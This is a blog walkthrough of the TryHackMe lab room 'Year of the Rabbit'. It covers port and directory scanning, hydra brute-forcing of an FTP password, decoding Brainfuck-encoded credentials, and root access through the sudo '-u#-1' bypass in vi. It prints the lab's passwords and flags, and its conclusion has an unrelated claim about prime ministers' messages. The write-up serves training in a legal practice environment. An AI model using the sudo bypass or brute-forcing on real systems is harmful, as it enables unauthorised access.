Tryhackme - Year of the Rabbit

Tryhackme – Year of the Rabbit

In this walk through, we will be going through the Year of the Rabbit from Tryhackme. This room is rated as easy on the platform and it covers Enumeration, Password bruteforcing, Exploitation and Privilege Escalation. So, let’s get started without any delay.

Year of the Rabbit

Machine Info:

TitleYear of the Rabbit
IPaddress10.10.122.215
DifficultyEasy
ObjectiveLet’s have a nice gentle start to the New Year!
Can you hack into the Year of the Rabbit box without falling down a hole?

Enumeration:

  • Starting with a regular nmap scan. Found ports 21,22 and 80 Open running FTP, SSH and HTTP respectively.

sudo nmap -sS -sV  10.10.122.215 

nmap scan

  • Firing up gobuster on port 80, found directory /assets. Navigating to it reveal style.css which gives us a directory – sup3r_s3cr3t_fl4g.php

wh1terose@fsociety:~$ gobuster dir -u http://10.10.122.215/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.122.215/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/24 21:39:49 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://10.10.122.215/assets/]
/index.html           (Status: 200) [Size: 7853]                                  
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  Progress: 3941 / 4656 (84.64%)                                                   
===============================================================
2023/04/24 21:41:41 Finished
===============================================================

gobuster scan

Index of /assets

secret flag directory

  • Navigating to the found directory, it executes an inline javascript file which redirects us to Youtube and Rick roll us.

Javascript popup

  • We disable that using firefox configuration settings. Go to about:config => Search for Javascript => Toggle it to false

about:config

Rick roll

  • Next as per the hint, i listen up the video, which reveals that it was a rabbit hole. Next, in Developer tools, reload the network tab, it gives us a hidden directory.

Network Tab

  • The hidden directory reveals a file named Hot_babe.png

Index of WExYY2Cv-qU

  • Finding some hidden strings inside the image file gives us a ftp username and potential wordlist which we can use later with hydra to bruteforce the password of user – ftpuser.

strings Hot_Babe.png

FTPuser wordlist

hydra -l ftpuser -P Wordlist ftp://10.10.122.215 

hydra bruteforce

wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ ftp 10.10.122.215 
Connected to 10.10.122.215.
220 (vsFTPd 3.0.2)
Name (10.10.122.215:wh1terose): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
ftp> ascii
200 Switching to ASCII mode.
ftp> get Eli's_Creds.txt 
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
WARNING! 11 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
758 bytes received in 0.00 secs (5.0551 MB/s)
ftp> exit
221 Goodbye.

  • Got a file “Eli’s_Creds.txt”. This contains some encrypted type. Cyberchef was of no use. Actually it is a programming language called brainfuck. So, decoded it using an online decoder and finds Eli’s password.

wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ cat "Eli's_Creds.txt" 
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++

Brainfuck decoder

Username: Eli

Password: DSpDiM1wAEwid

Initial Access:

  • Got our first shell using Eli’s creds with SSH.

ssh banner

  • As per the message, i find out the hidden secret place using find command. Found in /usr/games/s3cr3ts. It gives us gwendoline password.

eli@year-of-the-rabbit:/$ find / -name s3cr3t 2> /dev/null
/usr/games/s3cr3t

eli@year-of-the-rabbit:/$ 
eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t/
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 23  2020 .
drwxr-xr-x 3 root root 4096 Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root

Username: gwendoline

Password: MniVCQVhQHUNI

gwendoline password

  • We got our user flag!

user.txt

Privilege Escalation:

  • For Priv esc, this was also a rabbit hole. By sudo we can see that the sudo is configured to not to run. It can be bypassed using – sudo 1.8.27 – Security Bypass (https://www.exploit-db.com/exploits/47502)

gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$ 

sudo -l

  • Use the below command and when the vi terminal opens up. Type :! then. “cat /root/root.txt”. Press Enter. You will get your root flag.

gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Press ENTER or type command to continue

root.txt

root flag

Task 1 – Flags

Question 1 – What is the user flag?

THM{1107174691af9ff3681d2b5bdb5740b1589bae53}

Question 2 – What is the root flag?

THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Task 1 - Flags

Also Read: Tryhackme – Wireshark: The Basics

Conclusion:

Conclusion

So that was “Year of the Rabbit” for you. We started off with a regular nmap scan and found three ports opened – 80 (HTTP) and 22 (SSH) and 21(FTP). Next, performed directory bruteforcing with gobuster and found directory pattern of /assets which leads to a secret page named sup3r_s3cret_fl4g.php. After getting rickrolled by the page, used the network tab to reveal a hidden directory called WExYY2Cv-qU which has a file named called Hot_Babe.png. Next, i used strings command to get a potential password wordlist hidden in the image file. With the deduced wordlist, used hydra to bruteforce the FTP password of user ftpuser. Moving on, we got Elli’s creds from the FTP server encoded in Brainfuck language. We then decoded it and used it to get our initial access via SSH. At last, we moved to the Privilege escalation part where we used the vi binary to read the contents of the root.txt file and the messages between Israel and Palestine prime ministers. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top